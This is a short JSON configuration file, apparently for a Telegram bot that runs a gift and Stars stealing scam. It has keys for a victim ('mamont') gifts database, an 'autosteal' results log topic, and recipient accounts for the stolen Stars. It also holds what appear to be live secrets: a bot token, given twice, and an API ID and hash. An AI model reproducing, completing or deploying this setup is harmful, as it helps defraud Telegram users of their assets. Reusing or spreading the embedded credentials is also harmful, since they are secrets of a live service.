{
  "botToken": "8551785115:AAFLufYAGjYgyKR3Cc1wTbKyaGLLY91xtHM",
  "webUrl": "https://markedir.bothost.ru",
  "recipientUsername": "hartvest",
  "remainingStarsRecipient": "pleasespons",
  "apiId": 36138759,
  "photourl": "fdsfsd",
  "apiHash": "497475ab44e42a61fb70f5acf893c808",
  "marketWebAppUrl": "https://markedir.bothost.ru",
  "mamontGiftsDB": "mamont-gifts.json",
  "adminId": 422607292,
  "logGroupId": -1003854537544,
  "logTopicId": 2,
  "autostealResultsTopicId": 256,
  "BOT_TOKEN": "8551785115:AAFLufYAGjYgyKR3Cc1wTbKyaGLLY91xtHM",
  "starsChannelId": -1003846948092,
  "starsMessageId": 2
}